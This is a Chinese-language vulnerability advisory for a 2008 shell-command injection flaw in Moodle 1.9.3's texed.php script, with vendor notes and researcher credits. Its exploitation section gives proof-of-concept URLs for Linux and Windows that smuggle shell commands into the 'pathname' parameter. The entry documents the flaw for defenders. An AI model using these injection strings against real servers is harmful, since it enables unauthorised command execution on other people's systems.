添加时间:
2008-12-18

系统编号:
WAVDB-01298
BUGTRAQ: 32801

影响版本:
1.9.3

程序介绍:

Moodle是流行的开放源码课程管理系统。

漏洞分析:

Moodle的texed.php脚本没有对用户请求参数数据做充分的检查过滤，远程攻击者可能利用此漏洞通过在输入数据中插入Shell命令在服务器上执行任意命令。

漏洞利用:

Linux:
http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+"

Windows:
http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+

解决方案:
厂商补丁：
Moodle
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://moodle.org/

信息来源:
<*来源：Antonio "s4tan" Parata
Francesco "ascii" Ongaro
Giovanni "evilaliv3" Pellerano

链接：http://marc.info/?l=bugtraq&m=122910674604316&w=2
*>